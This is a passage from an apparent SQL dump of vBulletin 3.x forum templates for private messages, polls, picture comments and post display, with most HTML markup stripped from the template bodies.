\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n$postpreview\r\n\r\noptions[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n\".(($show[\'additional_options\']) ? (\"\r\n \r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n $vbphrase[delete_message]\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
$vbphrase[delete_message_check_appropriate_option]
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n
$vbphrase[reason_for_deletion]:
\r\n
\r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n\r\n$postpreview\r\n\r\n onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\">\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876440, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1480, -1, 'picturecomment_form', '\".(($show[\'quickcomment\']) ? (\"\r\n $vBeditTemplate[clientscript]\r\n\r\n \r\n
session->vars[\'sessionurl\'] . \"do=message\\\" method=\\\"post\\\" id=\\\"message_form\\\">\r\n \r\n\r\n \r\n
\r\n
$vbphrase[posting_message_please_wait] \r\n
\r\n \r\n
\r\n\") : (\"\")).\"\r\n', '\r\n $vBeditTemplate[clientscript]\r\n\r\n \r\n
\r\n \r\n\r\n \r\n
\r\n
$vbphrase[posting_message_please_wait] \r\n
\r\n \r\n
\r\n \r\n', 'template', 1209736605, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1481, -1, 'picturecomment_message', '', '', 'template', 1218204972, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1482, -1, 'picturecomment_message_deleted', '', '\r\n \r\n \r\n groupid=$pictureinfo[groupid] albumid=$pictureinfo[albumid] &pictureid=$pictureinfo[pictureid]&commentid=$message[commentid]\">$vbphrase[report]\r\n \r\n \r\n \r\n', 'template', 1219146391, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1483, -1, 'picturecomment_message_global_ignored', '', '', 'template', 1211901483, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1484, -1, 'picturecomment_message_ignored', '', '', 'template', 1208183818, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1485, -1, 'picturecomment_message_moderatedview', '', '', 'template', 1219147313, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1486, -1, 'picturecomment_preview', '\r\n\r\n \r\n \".(($show[\'errors\']) ? (\"\r\n $vbphrase[errors_occured_when_submitted]:\r\n \") : (\"\r\n $vbphrase[preview]\r\n \")).\"\r\n \r\n \r\n\r\n \r\n \".(($show[\'errors\']) ? (\"\r\n \r\n $errorlist \r\n \r\n \") : (\"\r\n\r\n \".(($newpost[\'title\']) ? (\"\r\n \r\n \r\n $message[title] \r\n
\r\n \r\n \r\n \") : (\"\")).\"\r\n $previewmessage\r\n \")).\"\r\n \r\n \r\n
\r\n\r\n ', '\r\n\r\n \r\n \r\n $vbphrase[errors_occured_when_submitted]:\r\n \r\n $vbphrase[preview]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n $errorlist \r\n \r\n \r\n\r\n \r\n \r\n \r\n $message[title] \r\n
\r\n \r\n \r\n \r\n $previewmessage\r\n \r\n \r\n \r\n
\r\n\r\n ', 'template', 1205156434, 'vBulletin Solutions', '3.7.0 Release Candidate 1', 'vbulletin'),
(1487, -1, 'pm_editfolderbit', '\r\n \r\n $vbphrase[folder_name]: \".(($show[\'messagecount\']) ? (\"$vbphrase[empty_folder] \") : (\"\")).\" \r\n \r\n \".(($show[\'messagecount\']) ? (\"$vbphrase[messages]: $foldertotal \") : (\"\")).\"\r\n \r\n ', '\r\n \r\n $vbphrase[folder_name]: $vbphrase[empty_folder] \r\n $vbphrase[folder_id_x]\" />\r\n $vbphrase[messages]: $foldertotal \r\n \r\n ', 'template', 1136290628, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1488, -1, 'pm_editfolders', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n $vbphrase[edit_folders] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[standard_folders] \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[x_contains_y_messages]\", \"private.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"folderid=0\", \"$vbphrase[inbox]\", \"$inboxtotal\") . \" $vbphrase[empty_folder] \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[x_contains_y_messages]\", \"private.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"folderid=-1\", \"$vbphrase[sent_items]\", \"$sentitemstotal\") . \" $vbphrase[empty_folder] \r\n \r\n
\r\n \r\n\r\n \".(($show[\'customfolders\']) ? (\"\r\n
\r\n $vbphrase[your_custom_folders] \r\n \r\n $editfolderbits\r\n \r\n $vbphrase[to_rename_a_folder] \r\n \r\n \r\n $vbphrase[to_delete_a_folder] \r\n \r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n $vbphrase[add_new_folders] \r\n \r\n $addfolderbits\r\n \r\n $vbphrase[to_add_a_new_folder] \r\n \r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[edit_folders] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[standard_folders] \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[your_custom_folders] \r\n \r\n $editfolderbits\r\n \r\n $vbphrase[to_rename_a_folder] \r\n \r\n \r\n $vbphrase[to_delete_a_folder] \r\n \r\n
\r\n \r\n \r\n\r\n
\r\n $vbphrase[add_new_folders] \r\n \r\n $addfolderbits\r\n \r\n $vbphrase[to_add_a_new_folder] \r\n \r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208876524, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1489, -1, 'pm_emptyfolder', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[confirm_deletion] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[confirm_deletion] \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[delete_items_in_x]\", \"$folder\") . \" \r\n \r\n
\r\n \r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[confirm_deletion] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[confirm_deletion] \r\n \r\n \r\n $vbphrase[delete_items_in_x] \r\n \r\n
\r\n \r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208876532, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1490, -1, 'pm_filter', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n\r\n\r\n options[\'simpleversion\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n $vbphrase[display_options]\r\n \r\n \r\n \r\n\r\n\r\n \r\n \".(($show[\'popups\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\".(($show[openfilter]) ? (\"\r\n \r\n\") : (\"\")).\"', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n $vbphrase[display_options]\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n \r\n ', 'template', 1238668943, 'vBulletin Solutions', '3.8.3', 'vbulletin'),
(1491, -1, 'pm_messagelist', '\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n \r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[private_messages_in_folder]: $foldername \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n
\r\n $vbphrase[folder_controls] \r\n \r\n \r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\".(($show[\'messagelist\']) ? (\"\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n \".(($pagenav) ? (\"$pagenav \") : (\"\")).\"\r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n \".(($pagenav) ? (\"$pagenav \") : (\"\")).\"\r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n$sortfilter\r\n\r\n \r\n\r\n\r\n\r\n', '\r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[private_messages_in_folder]: $foldername \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n
\r\n $vbphrase[folder_controls] \r\n \r\n \r\n $vbphrase[x_contains_y_z_messages_of_xx] ($vbphrase[empty_folder] ) \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[messages_stored_in_folder_x]\"> \r\n $vbphrase[total_messages_in_all_folders_x]\"> \r\n 0\">$vbphrase[maximum_allowed_messages_x]\"> \r\n \r\n
\r\n \r\n \r\n \r\n \r\n $vbphrase[jump_to_folder]: \r\n \r\n $folderjump\r\n $gobutton\r\n \r\n \r\n \r\n $vbphrase[you_have_x_and_y_receipts] \r\n \r\n
\r\n \r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n \r\n\r\n \r\n\r\n$sortfilter\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n $vbphrase[unread_message] \r\n \r\n \r\n \r\n $vbphrase[read_message] \r\n \r\n \r\n \r\n $vbphrase[repliedto_message] \r\n \r\n \r\n \r\n $vbphrase[forwarded_message] \r\n \r\n
\r\n \r\n \r\n $vbphrase[download_all_private_messages_as] : \r\n $vbphrase[xml] |\r\n $vbphrase[csv] |\r\n $vbphrase[text] \r\n \r\n \r\n\r\n $forumjump \r\n \r\n
\r\n', 'template', 1223393656, 'vBulletin Solutions', '3.8.0 Alpha 2', 'vbulletin'),
(1492, -1, 'pm_messagelistbit', '\r\n \r\n \".(($show[\'pmicons\']) ? (\"\".(($show[\'pmicon\']) ? (\" \") : (\" \")).\" \") : (\"\")).\"\r\n \r\n \r\n \r\n $pm[sendtime] \r\n \".(($show[\'unread\']) ? (\"$userbit \") : (\"$userbit\")).\"\r\n
\r\n\r\n \r\n \".(($show[\'pmcheckbox\']) ? (\" \") : (\"\")).\"\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n $pm[sendtime] \r\n $userbit $userbit \r\n
\r\n\r\n \r\n \r\n ', 'template', 1221578878, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1493, -1, 'pm_messagelistbit_ignore', '\r\n \r\n \r\n \r\n \".(($show[\'pmcheckbox\']) ? (\" \") : (\"\")).\"\r\n ', '\r\n \r\n \r\n \r\n \r\n ', 'template', 1221578903, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1494, -1, 'pm_messagelistbit_user', 'session->vars[\'sessionurl\'] . \"u=$userid\';\\\">$username ', '$username ', 'template', 1205932165, 'vBulletin Solutions', '3.7.0 Release Candidate 2', 'vbulletin'),
(1495, -1, 'pm_messagelist_periodgroup', '\r\n \r\n \r\n \r\n
\r\n $vbphrase[messages]: $messagesingroup \r\n \r\n
\r\n \r\n
$groupname \r\n
\r\n \r\n \r\n \r\n \r\n\r\n $messagelistbits\r\n ', '\r\n \r\n 3 2\" style=\"padding-top:3px; padding-bottom:3px; border-bottom:1px outset; cursor:pointer;\" ondblclick=\"toggle_collapse(\'pmf$groupid\')\" width=\"100%\">\r\n \r\n
\r\n $vbphrase[messages]: $messagesingroup \r\n \r\n
\r\n \r\n
$groupname \r\n
\r\n \r\n \r\n \r\n \r\n\r\n $messagelistbits\r\n ', 'template', 1223906167, 'vBulletin Solutions', '3.8.0 Beta 2', 'vbulletin'),
(1496, -1, 'pm_movepm', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n ', 'template', 1208876563, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1497, -1, 'pm_newpm', '\r\n\r\n$postpreview\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n \".(($show[\'receivepmbuddies\']) ? (\"\r\n
\r\n $vbphrase[pm_non_contacts_heading] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$forumrules', ' onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(this.title.value, 0)\">\r\n\r\n$postpreview\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n \r\n $vbphrase[pm_non_contacts_heading] \r\n \r\n \r\n \r\n\r\n
\r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$forumrules', 'template', 1212142724, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1498, -1, 'pm_nomessagehistory', '\r\n\r\n \r\n $vbphrase[no_message_history]\r\n \r\n \r\n
', '\r\n\r\n \r\n $vbphrase[no_message_history]\r\n \r\n \r\n
', 'template', 1226500884, 'vBulletin Solutions', '3.8.0 Beta 3', 'vbulletin'),
(1499, -1, 'pm_popup_script', '', '', 'template', 1125409057, 'vBulletin Solutions', '3.5.0 Release Candidate 3', 'vbulletin'),
(1500, -1, 'pm_quickreply', '\".(($show[\'editor_toolbar\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n
\r\n $newpost[message] \r\n \r\n \r\n\r\n\r\n \r\n session->vars[\'styleid\'] . \"\\\" />\r\n\r\n', '\r\n\r\n \r\n\r\n
\r\n $newpost[message] \r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n', 'template', 1214911577, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1501, -1, 'pm_receipts', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n \r\n\r\n ', '\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n ', 'template', 1208876586, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1502, -1, 'pm_receiptsbit', '\r\n $receipt[title] $vbphrase[sent_to]: session->vars[\'sessionurl\'] . \"u=$receipt[touserid]\\\">$receipt[tousername] \r\n $receipt[send_date] $receipt[send_time] \r\n \".(($show[\'readpm\']) ? (\"$receipt[read_date] $receipt[read_time] \") : (\"$vbphrase[unread_date] \")).\" \r\n \r\n ', '\r\n $receipt[title] $vbphrase[sent_to]: $receipt[tousername] \r\n $receipt[send_date] $receipt[send_time] \r\n $receipt[read_date] $receipt[read_time] $vbphrase[unread_date] \r\n \r\n ', 'template', 1137198627, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1503, -1, 'pm_showpm', '\".(($show[\'receiptprompt\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[private_message]: $pm[original_title] \r\n \r\n \r\n\".(($show[\'recipients\']) ? (\"\r\n\r\n \".(($ccrecipients) ? (\"$vbphrase[recipients] : $ccrecipients \") : (\"\")).\"\".(($bccrecipients) ? (\"$vbphrase[recipients] ($vbphrase[bcc]) : $bccrecipients\") : (\"\")).\" \r\n \r\n\") : (\"\")).\"\r\n
\r\n\r\n$postbit\r\n\r\n \r\n\r\n\".(($show[\'receiptprompt\']) ? (\"\r\n \r\n \r\n \r\n $vbphrase[confirm_outstanding_receipt] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'quickreply\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n\".(($pm[\'parentpmid\']) ? (\"\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[message_history]\r\n \r\n \r\n \r\n
\r\n\r\n$threadpms\r\n
\r\n\r\n\r\n\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n ', '\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n
\r\n
\r\n $vbphrase[private_message]: $pm[original_title] \r\n \r\n \r\n\r\n\r\n $vbphrase[recipients] : $ccrecipients$vbphrase[recipients] ($vbphrase[bcc]) : $bccrecipients \r\n \r\n \r\n
\r\n\r\n$postbit\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[confirm_outstanding_receipt] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[message_history]\r\n \r\n \r\n \r\n
\r\n\r\n$threadpms\r\n
\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n ', 'template', 1249925831, 'vBulletin Solutions', '3.8.4', 'vbulletin'),
(1504, -1, 'pm_trackpm', '\".(($show[\'receipts\']) ? (\"\r\n$confirmedreceipts\r\n\r\n\".(($confirmed_pagenav) ? (\"$confirmed_pagenav \") : (\"\")).\"\r\n\r\n$unconfirmedreceipts\r\n$unconfirmed_pagenav\r\n\") : (\"\r\n\r\n\r\n \r\n $vbphrase[message_tracking]\r\n \r\n \r\n\r\n \r\n \r\n $vbphrase[not_tracking_any_messages]\r\n \r\n \r\n \r\n \r\n
\r\n\")).\"', '\r\n$confirmedreceipts\r\n\r\n$confirmed_pagenav \r\n\r\n$unconfirmedreceipts\r\n$unconfirmed_pagenav\r\n \r\n\r\n\r\n \r\n $vbphrase[message_tracking]\r\n \r\n \r\n\r\n \r\n \r\n $vbphrase[not_tracking_any_messages]\r\n \r\n \r\n \r\n \r\n
\r\n ', 'template', 1224683653, 'vBulletin Solutions', '3.8.0 Beta 2', 'vbulletin'),
(1505, -1, 'polleditbit', '\r\n \" . construct_phrase(\"$vbphrase[option_x]\", \"$option[number]\") . \": \r\n $vbphrase[votes]: \r\n ', '\r\n $vbphrase[option_x] : \r\n $vbphrase[votes]: \r\n ', 'template', 1070083596, 'vBulletin Solutions', '', 'vbulletin'),
(1506, -1, 'pollnewbit', '\r\n \" . construct_phrase(\"$vbphrase[option_x]\", \"$option[number]\") . \": \r\n \r\n', '\r\n $vbphrase[option_x] : \r\n \r\n', 'template', 1070083614, 'vBulletin Solutions', '', 'vbulletin'),
(1507, -1, 'polloption', ' $option[question]
\r\n', ' $option[question]
\r\n', 'template', 1069784992, 'vBulletin Solutions', '', 'vbulletin'),
(1508, -1, 'polloptions_table', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n \r\n \".(($show[\'editpoll\']) ? (\"session->vars[\'sessionurl\'] . \"do=polledit&pollid=$pollinfo[pollid]\\\">$vbphrase[edit_poll] \") : (\"\")).\"\r\n $vbphrase[poll]: $pollinfo[question] \r\n \r\n \r\n\".(($show[\'pollenddate\']) ? (\"\r\n\r\n \" . construct_phrase(\"$vbphrase[this_poll_will_close_on_x_at_y]\", \"$pollenddate\", \"$pollendtime\") . \" \r\n \r\n\") : (\"\")).\"\r\n\r\n \r\n \r\n
\r\n\r\n \".(($show[\'publicwarning\']) ? (\"\r\n
$vbphrase[public_poll_users_see_choices]
\r\n \") : (\"\")).\"\r\n\r\n
\r\n $vbphrase[poll_options] \r\n \r\n
$pollinfo[question]
\r\n $pollbits\r\n
\r\n \r\n\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[edit_poll] \r\n $vbphrase[poll]: $pollinfo[question] \r\n \r\n \r\n\r\n\r\n $vbphrase[this_poll_will_close_on_x_at_y] \r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[public_poll_users_see_choices]
\r\n \r\n\r\n
\r\n $vbphrase[poll_options] \r\n \r\n
$pollinfo[question]
\r\n $pollbits\r\n
\r\n \r\n\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n ', 'template', 1208876587, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1509, -1, 'polloption_multiple', ' $option[question]
\r\n', ' $option[question]
\r\n', 'template', 1069785015, 'vBulletin Solutions', '', 'vbulletin'),
(1510, -1, 'pollpreview', '\r\n\r\n $vbphrase[poll_preview] \r\n \r\n\r\n \r\n $previewquestion
\r\n $vbphrase[options]: $pollpreviewbits
\r\n \r\n \r\n
\r\n\r\n \r\n', '\r\n\r\n $vbphrase[poll_preview] \r\n \r\n\r\n \r\n $previewquestion
\r\n $vbphrase[options]: $pollpreviewbits
\r\n \r\n \r\n
\r\n\r\n \r\n', 'template', 1070526896, 'vBulletin Solutions', '', 'vbulletin'),
(1511, -1, 'pollresult', '\r\n \r\n \".(($option[\'uservote\']) ? (\"\r\n $option[question] \r\n \") : (\"\r\n $option[question]\r\n \")).\"\r\n \".(($show[\'pollvoters\']) ? (\"$names
\") : (\"\")).\"\r\n \r\n \r\n options[\'cleargifurl\'] . \"\\\" alt=\\\"\\\" width=\\\"$option[remainder]\\\" height=\\\"10\\\" />\r\n \r\n $option[votes] \r\n $option[percent]% \r\n \r\n', '\r\n \r\n \r\n $option[question] \r\n \r\n $option[question]\r\n \r\n $names
\r\n \r\n \r\n \r\n \r\n $option[votes] \r\n $option[percent]% \r\n \r\n', 'template', 1201278148, 'vBulletin Solutions', '3.7.0 Beta 5', 'vbulletin'),
(1512, -1, 'pollresults', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[view_poll_results] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$pollresults\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[view_poll_results] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$pollresults\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1195729862, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1513, -1, 'pollresults_table', '\r\n\r\n ', '\r\n\r\n \r\n $vbphrase[edit_poll] \r\n $vbphrase[view_poll_results]: $pollinfo[question] \r\n \r\n \r\n\r\n\r\n $vbphrase[this_poll_will_close_on_x_at_y] \r\n \r\n \r\n$pollbits\r\n\r\n \r\n \r\n
\r\n\r\n ', 'template', 1105552570, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'),
(1514, -1, 'postbit', '$template_hook[postbit_start]\r\n\r\n\r\n \r\n \r\n\r\n \r\n \r\n
\r\n \".((!$show[\'announcement\']) ? (\"\r\n $post[postdate]\".((!$show[\'detailedtime\']) ? (\", $post[posttime]\") : (\"\")).\"\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[x_until_y]\", \"$post[startdate]\", \"$post[enddate]\") . \"\r\n \")).\"\r\n $post[firstnewinsert]\r\n \r\n
\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \".(($show[\'avatar\']) ? (\"session->vars[\'sessionurl\'] . \"u=$post[userid]\\\"> \") : (\"\")).\"\r\n \r\n\r\n \r\n\r\n \".(($post[\'usertitle\']) ? (\"$post[usertitle]
\") : (\"\")).\"\r\n \".(($post[\'rank\']) ? (\"$post[rank]
\") : (\"\")).\"\r\n $template_hook[postbit_userinfo_left]\r\n\r\n \r\n \r\n \r\n\r\n \r\n \".(($post[\'joindate\']) ? (\"
$vbphrase[join_date]: $post[joindate]
\") : (\"\")).\"\r\n \".(($post[\'field2\']) ? (\"
$vbphrase[location_perm]: $post[field2]
\") : (\"\")).\"\r\n \".(($post[\'age\']) ? (\"
$vbphrase[age]: $post[age]
\") : (\"\")).\"\r\n
\r\n $vbphrase[posts]: $post[posts]\r\n
\r\n $template_hook[postbit_userinfo_right_after_posts]\r\n \".(($show[\'infraction\']) ? (\"
$vbphrase[infractions]: $post[warnings]/$post[infractions] ($post[ipoints])
\") : (\"\")).\"\r\n \".(($show[\'reputation\']) ? (\"\".(($show[\'reppower\']) ? (\"$vbphrase[reppower]:
$post[reppower] \") : (\"\")).\"
$post[reputationdisplay]
\") : (\"\")).\"\r\n $template_hook[postbit_userinfo_right]\r\n
$post[icqicon] $post[aimicon] $post[msnicon] $post[yahooicon] $post[skypeicon]
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n \r\n\r\n \".(($show[\'moderated\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\" \r\n \r\n\r\n $template_hook[postbit_messagearea_start]\r\n\r\n \".(($show[\'messageicon\'] OR $post[\'title\']) ? (\"\r\n \r\n \r\n \".(($show[\'messageicon\']) ? (\"
\") : (\"\")).\"\r\n \".(($post[\'title\']) ? (\"
$post[title] \") : (\"\")).\"\r\n
\r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n \r\n $ad_location[ad_showthread_firstpost_start]\r\n $post[message]\r\n
\r\n \r\n\r\n \".(($show[\'attachments\']) ? (\"\r\n \r\n \r\n\r\n \".(($show[\'thumbnailattachment\']) ? (\"\r\n
\r\n $vbphrase[attached_thumbnails] \r\n \r\n $post[thumbnailattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachment\']) ? (\"\r\n
\r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachmentlink\']) ? (\"\r\n
\r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachmentlinks]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'otherattachment\']) ? (\"\r\n
\r\n $vbphrase[attached_files] \r\n \r\n $post[otherattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'moderatedattachment\']) ? (\"\r\n
\r\n $vbphrase[attachments_pending_approval] \r\n \r\n $post[moderatedattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n $template_hook[postbit_signature_start]\r\n $ad_location[ad_showthread_firstpost_sig]\r\n\r\n \".(($post[\'signature\']) ? (\"\r\n \r\n \r\n __________________ \r\n $post[signature]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n $template_hook[postbit_signature_end]\r\n\r\n \".(($show[\'postedited\']) ? (\"\r\n \r\n \r\n
